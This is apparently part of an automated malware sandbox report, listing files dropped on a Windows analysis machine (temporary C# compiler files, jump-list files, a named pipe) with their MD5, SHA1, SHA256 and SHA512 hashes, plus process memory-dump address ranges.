5a735f613dc76659cf771c1fee88eb4312c61f9e448bf9d2a64ffbb96fc1b7c9

SHA512
142575848320b72b6e6b53d8e1ea773bf063b52ae4ef3131ae3f1934cef6331a0af9b04347d36ecc584c2843ff72d03d26791a57e3d80c605d56d8090b728cbf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d0ca6ed42f0d8cc739bb940620a8a29c

SHA1
7d996ac9b10e7a2c3a7a530858a6501d9e074fe7

SHA256
5a735f613dc76659cf771c1fee88eb4312c61f9e448bf9d2a64ffbb96fc1b7c9

SHA512
142575848320b72b6e6b53d8e1ea773bf063b52ae4ef3131ae3f1934cef6331a0af9b04347d36ecc584c2843ff72d03d26791a57e3d80c605d56d8090b728cbf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d0ca6ed42f0d8cc739bb940620a8a29c

SHA1
7d996ac9b10e7a2c3a7a530858a6501d9e074fe7

SHA256
5a735f613dc76659cf771c1fee88eb4312c61f9e448bf9d2a64ffbb96fc1b7c9

SHA512
142575848320b72b6e6b53d8e1ea773bf063b52ae4ef3131ae3f1934cef6331a0af9b04347d36ecc584c2843ff72d03d26791a57e3d80c605d56d8090b728cbf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
d0ca6ed42f0d8cc739bb940620a8a29c

SHA1
7d996ac9b10e7a2c3a7a530858a6501d9e074fe7

SHA256
5a735f613dc76659cf771c1fee88eb4312c61f9e448bf9d2a64ffbb96fc1b7c9

SHA512
142575848320b72b6e6b53d8e1ea773bf063b52ae4ef3131ae3f1934cef6331a0af9b04347d36ecc584c2843ff72d03d26791a57e3d80c605d56d8090b728cbf

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6CA9.tmp

Filesize
652B

MD5
4ddd3d999054c4755c1bb14f4f171767

SHA1
2bcf7bfab97c91c6f6a737fb6bf33df4bd179f9a

SHA256
1d4a09bc42b1421e4c068ea9444661c78a4dd183c64e0c3e606828526b42a61d

SHA512
ef15c361ab9f8249f84ecf71e881495754b4d70d093e1637d9f035d5e828f204801290b9f37ef5ea74f934fddea7cd86e8c6bc21338f824c99cf5aee78e656b9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC894D.tmp

Filesize
652B

MD5
2f1c18d016a131bb46c30b09ce2c0bb2

SHA1
db84522380f19b2ce5fcb43f789bad19418c0ef3

SHA256
9b3ba15615dd294c8d65c6955bce0f8189561e35fb15f4cf8173ad731d190cff

SHA512
62aa1849984718d7a65add60cbab30f19598cd12a5a6652260cb578854971837d4357c24d97dce35a6d011a17735bbad802b58786fcc660f1d9dec49f064fc5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\krnx8_y1.0.cs

Filesize
411B

MD5
6b96794b465c742fb316ceb62f518011

SHA1
8335b75018077b1ff6953a7d8d4a2666db1916c0

SHA256
b0bb0e4ded070a419c82e3704596e8a4f7023357e72f6849a235311d7c107d16

SHA512
8cbc7f1e612d125edf78ccfa523b23d856ee3ad1dc8bc96cdcbc146223fad00e7becbe9b31c6a77b3fea56f1851396cb774c624bb41caafb91c6858cb4247df4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\krnx8_y1.cmdline

Filesize
309B

MD5
b231dbcd354723b4f041baf98e73f9e2

SHA1
cbd77c62cabe7b56c16ae27d5fe14ca2aadc70ac

SHA256
927672857291a33f1957c29e1a9e952c8c6904e28b6dac437dcdfb64a18939e2

SHA512
9709988f87b13adc806c698ec75036c0c720c741e72c02d655776a6a5032f30a543792a05d3a7c33e64f629f6a9e85b9181b31c97a7e34f503071b73ac0856ad

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lwl6j5mi.0.cs

Filesize
656B

MD5
5c3b9d846e909a6c7a075b04306994de

SHA1
a7ae3a2213d56996fd6af8fc2d62f27279d876fc

SHA256
9d2683d7bccd6f660645ee742e2b14653cbe99ef7e24f2569e6ffad048438752

SHA512
b20f53044c5325874dc2332d51a8a3f8d577f00c6e27c405bffd322468b30ddaac82edacf05af8789fa549169e6f9656f46b9ce1cc4d9d02108b196d4ff177e8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\lwl6j5mi.cmdline

Filesize
309B

MD5
210fbdac71e4fb3ee593901fef5c6b75

SHA1
609ad7f1fde4d3ae9b5aed285a1e7c8713a6e414

SHA256
5befbd48afeb0af2dc56fd57048b028c0a7ae2319227ae1ab7fa4050f1490058

SHA512
dec4a6d8157885515822b033f71e99de47deebf717a300dff2d9c313f6351d2ce1e0238be5ac3d381a31a25c44965a14208f21c8996bd582885e10281039d37c

Download Submit
memory/272-99-0x0000000000000000-mapping.dmp

Download
memory/324-110-0x0000000000000000-mapping.dmp

Download
memory/528-70-0x0000000000000000-mapping.dmp

Download
memory/696-102-0x0000000000000000-mapping.dmp

Download
memory/848-90-0x000000000262B000-0x000000000264A000-memory.dmp

Filesize
124KB

Download
memory/848-78-0x0000000000000000-mapping.dmp

Download
memory/848-81-0x000007FEF4300000-0x000007FEF4D23000-memory.dmp

Filesize
10.1MB

Download
memory/848-82-0x000007FEF37A0000-0x000007FEF42FD000-memory.dmp

Filesize
11.4MB

Download
memory/848-83-0x0000000002624000-0x0000000002627000-memory.dmp

Filesize
12KB

Download
memory/1232-97-0x000000000278B000-0x00000000027AA000-memory.dmp

Filesize
124KB

Download
memory/1232-88-0x000007FEF4300000-0x000007FEF4D23000-memory.dmp

Filesize
10.1MB

Download
memory/1232-89-0x000007FEF37A0000-0x000007FEF42FD000-memory.dmp

Filesize
11.4MB

Download
memory/1232-91-0x0000000002784000-0x0000000002787000-memory.dmp

Filesize
12KB

Download
memory/1232-84-0x0000000000000000-mapping.dmp

Download
memory/1524-67-0x000007FEF4140000-0x000007FEF4C9D000-memory.dmp

Filesize
11.4MB

Download
memory/1524-62-0x0000000000000000-mapping.dmp

Download
memory/1524-69-0x000000000239B000-0x00000000023BA000-memory.dmp

Filesize
124KB

Download
memory/1524-68-0x0000000002394000-0x0000000002397000-memory.dmp

Filesize
12KB

Download
memory/1524-66-0x000007FEF4CA0000-0x000007FEF56C3000-memory.dmp

Filesize
10.1MB

Download
memory/1532-92-0x0000000000000000-mapping.dmp

Download
memory/1532-107-0x000000000048B000-0x0000000000490000-memory.dmp

Filesize
20KB

Download
memory/1532-98-0x00000000028E4000-0x00000000028E7000-memory.dmp

Filesize
12KB

Download
memory/1532-96-0x000007FEF37A0000-0x000007FEF42FD000-memory.dmp

Filesize
11.4MB

Download
memory/1532-95-0x000007FEF4300000-0x000007FEF4D23000-memory.dmp

Filesize
10.1MB

Download
memory/1532-108-0x00000000028EB000-0x000000000290A000-memory.dmp

Filesize
124KB

Download
memory/1532-109-0x000000000048B000-0x000000000048D000-memory.dmp

Filesize
8KB

Download
memory/1720-73-0x0000000000000000-mapping.dmp

Download
memory/1976-60-0x000007FEF4140000-0x000007FEF4C9D000-memory.dmp

Filesize
11.4MB

Download
memory/1976-59-0x000007FEF4CA0000-0x000007FEF56C3000-memory.dmp

Filesize
10.1MB

Download
memory/1976-57-0x0000000000000000-mapping.dmp

Download
memory/1976-61-0x0000000002674000-0x0000000002677000-memory.dmp

Filesize
12KB

Download
memory/1976-64-0x000000000267B000-0x000000000269A000-memory.dmp

Filesize
124KB

Download
memory/2000-55-0x0000000000000000-mapping.dmp

Download
memory/2020-54-0x000007FEFC341000-0x000007FEFC343000-memory.dmp

Filesize
8KB

Download